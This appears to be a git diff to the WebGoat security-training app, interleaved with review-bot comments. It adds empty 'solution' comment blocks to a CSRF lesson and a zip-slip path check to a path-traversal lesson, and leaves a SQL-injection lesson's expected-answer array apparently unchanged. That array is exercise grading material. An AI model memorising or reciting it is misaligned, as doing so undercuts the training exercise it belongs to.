diff --git a/src/main/java/org/owasp/webgoat/lessons/csrf/CSRFFeedback.java b/src/main/java/org/owasp/webgoat/lessons/csrf/CSRFFeedback.java
index 4f4beb91a..83ff19850 100644
--- a/src/main/java/org/owasp/webgoat/lessons/csrf/CSRFFeedback.java
+++ b/src/main/java/org/owasp/webgoat/lessons/csrf/CSRFFeedback.java
@@ -112,10 +112,23 @@ private boolean requestContainsWebGoatCookie(Cookie[] cookies) {
 return false;
 }
- /**
+ /** error solution
 * Solution
*/
+
+ /** correct solution
+ *
+ *
+ *
+ *
+ *
+ *
+ *
+ */
 }
diff --git a/src/main/java/org/owasp/webgoat/lessons/pathtraversal/ProfileZipSlip.java b/src/main/java/org/owasp/webgoat/lessons/pathtraversal/ProfileZipSlip.java
index 49c7b15c3..a0ccf6081 100644
--- a/src/main/java/org/owasp/webgoat/lessons/pathtraversal/ProfileZipSlip.java
+++ b/src/main/java/org/owasp/webgoat/lessons/pathtraversal/ProfileZipSlip.java
@@ -71,6 +71,27 @@ private AttackResult processZipUpload(MultipartFile file) {
 while (entries.hasMoreElements()) {
 ZipEntry e = entries.nextElement();
 File f = new File(tmpZipDirectory.toFile(), e.getName());
+
+ // 防止路径穿越
+ String canonicalDestinationDir = tmpZipDirectory.toFile().getCanonicalPath(); // 获取上传目录
+ String canonicalDestinationFile = f.getCanonicalPath(); // 获取上传的文件路径
+
+ if (!canonicalDestinationFile.startsWith(canonicalDestinationDir + File.separator)) {
+ throw new SecurityException("Entry is outside of the target dir: " + e.getName());
+ }
+
+ // 如果条目是目录,则创建目录
+ if (e.isDirectory()) {
+ f.mkdirs();
+ continue;
+ }
+
+ // 确保父目录存在
+ File parentFile = f.getParentFile();
+ if (parentFile != null) {
+ parentFile.mkdirs();
+ }
+
 InputStream is = zip.getInputStream(e);
 Files.copy(is, f.toPath(), StandardCopyOption.REPLACE_EXISTING);
 }
diff --git a/src/main/java/org/owasp/webgoat/lessons/sqlinjection/mitigation/SqlInjectionLesson10a.java b/src/main/java/org/owasp/webgoat/lessons/sqlinjection/mitigation/SqlInjectionLesson10a.java
index fbe551427..cab3f4cc7 100644
--- a/src/main/java/org/owasp/webgoat/lessons/sqlinjection/mitigation/SqlInjectionLesson10a.java
+++ b/src/main/java/org/owasp/webgoat/lessons/sqlinjection/mitigation/SqlInjectionLesson10a.java
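Review bot: The `/** correct solution ... */` block added just before what appears to be the closing brace of CSRFFeedback is empty, and neither it nor the renamed `/** error solution` comment precedes a declaration, so they are not Javadoc for any member and currently document nothing. Either fill the block with the intended explanation or remove it; if these are lesson notes rather than API documentation, a short plain comment such as `// Lesson note: why the solution above fails, and the working variant` would say more than an empty run of star lines. The body of the `* Solution` comment and the rest of the class lie above the hunk.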
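Review bot: The three new comments inside the `while` loop of processZipUpload are in Chinese while the visible context and the new exception message are in English; for maintainability write them in the file's language, e.g. `// Reject entries whose canonical path resolves outside the extraction directory (zip slip)`, `// Directory entries are created, not copied`, `// Ensure the parent directory exists before copying the entry`. `tmpZipDirectory.toFile().getCanonicalPath()` is a filesystem call that does not depend on the entry, so compute `canonicalDestinationDir` once before the loop instead of on every iteration. Both `mkdirs()` return values are dropped, so a directory that could not be created is only noticed by the later `Files.copy` failure; checking them, or using `Files.createDirectories(f.toPath())` which throws on failure, gives a clearer error. The `InputStream` from `zip.getInputStream(e)` on the context line below is never closed; that predates this change, but a try-with-resources around the `Files.copy` call would fix it. `processZipUpload` begins above the hunk and, judging by the path, this class looks like the WebGoat path-traversal lesson endpoint that learners are meant to exercise, so confirm that hardening it here does not make the assignment unsolvable.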
@@ -38,7 +38,7 @@ public class SqlInjectionLesson10a extends AssignmentEndpoint {
 private String[] results = {
- "getConnection", "PreparedStatement", "prepareStatement", "?", "?", "setString", "setString"
+ "getConnection", "PreparedStatement", "prepareStatement", "?", "?", "setString", "setString"
 };
 @PostMapping("/SqlInjectionMitigations/attack10a")